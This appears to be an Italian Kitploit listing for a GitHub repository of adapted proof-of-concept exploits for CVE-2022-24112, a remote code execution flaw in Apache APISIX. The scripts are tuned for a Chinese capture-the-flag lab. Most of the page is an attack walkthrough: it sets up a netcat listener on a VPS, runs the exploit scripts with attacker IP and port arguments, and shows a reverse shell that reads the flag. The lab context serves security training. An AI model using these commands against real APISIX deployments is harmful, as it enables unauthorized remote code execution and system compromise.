Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-24112_POC — CVE-2022-24112_POC | Kitploit
Strumenti/GitHubGitHub/acczdy/cve-2022-24112_poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingSicurezza delle API
GitHubacczdy/cve-2022-24112_poc

CVE-2022-24112_POC

CVE-2022-24112_POC

Vedi Repository
5113 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

POC

POC raccolti

CVE-2022-24112

Per l'ambiente del campo di tiro 春秋云境:CVE-2022-24112, ho modificato due POC, modificando leggermente i POC dei due autori M4xSec e twseptian per adattarli al campo di tiro 春秋云境:


春秋云境:CVE-2022-24112:

Apache Apisix è un gateway API cloud-native per microservizi della Apache Software Foundation. Il software è basato su OpenResty e etcd, con routing dinamico e caricamento a caldo dei plugin, adatto alla gestione delle API nei microservizi. Apache APISIX presenta una vulnerabilità di esecuzione di codice remoto, causata dal fatto che il plugin batch-requests non limita efficacemente le richieste batch degli utenti. Un utente malintenzionato può sfruttare questa vulnerabilità per bypassare le restrizioni IP dell'Admin API, portando facilmente all'esecuzione di codice remoto.


POC originali:

  1. M4xSec: https://github.com/M4xSec/Apache-APISIX-CVE-2022-24112/blob/main/apisix-exploit.py

  2. twseptian: https://github.com/twseptian/cve-2022-24112/blob/main/poc/poc2.py

I POC modificati sono i due scritti sopra, rispettivamente per ambienti Linux e Windows:


CVE-2022-24112_Linux_by_twseptian.py

  1. Avviare l'ascolto sul VPS: nc -lvvp 18888

  2. Entrare nella directory del POC ed eseguire:

    Nota: quando si aggiungono i dati con -t, non è necessario scrivere http:// o https://, basta il dominio e la porta, come segue:

Scarica lo strumento
root@kitploit:~
python3 CVE-2022-24112_Linux_by_twseptian.py -t eci-eninecsteC2zon6q0xod9n5r7me4ih.cloudeci1.ichunqiu.com:9080 -L VPS_IP -P VPS_PODRPODR
  • Tornare a controllare il VPS, il risultato è il seguente:

    root@kitploit:~
    [root@root ~]# nc -lvvp 18888
    Ncat: Version 7.50 ( https://nmap.org/ncat )
    Ncat: Listening on :::18888
    Ncat: Listening on 0.0.0.0:18888
    Ncat: Connection from x.x.x.x.
    Ncat: Connection from x.x.x.x:x.
    id
    uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
    cat /flag
    flag{0834f79f-5f40-4389-bce7-c64e969734c4}
    

  • CVE-2022-24112_Windows_by_M4xSec.py

    1. Avviare l'ascolto sul VPS: nc -lvvp 18888

    2. Entrare nella directory del POC ed eseguire:

      Nota: quando si aggiungono i dati con -t, non è necessario scrivere http:// o https://, basta il dominio e la porta, come segue:

      root@kitploit:~
      python3 CVE-2022-24112_Windows_by_M4xSec.py eci-eninecsteC2zon6q0xod9n5r7me4ih.cloudeci1.ichunqiu.com:9080 VPS_IP VPS_PODRPODR
      
    3. Tornare a controllare il VPS, il risultato è il seguente:

      root@kitploit:~
      [root@root ~]# nc -lvvp 18888
      Ncat: Version 7.50 ( https://nmap.org/ncat )
      Ncat: Listening on :::18888
      Ncat: Listening on 0.0.0.0:18888
      Ncat: Connection from x.x.x.x.
      Ncat: Connection from x.x.x.x:x.
      id
      uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
      cat /flag
      flag{0834f79f-5f40-4389-bce7-c64e969734c4}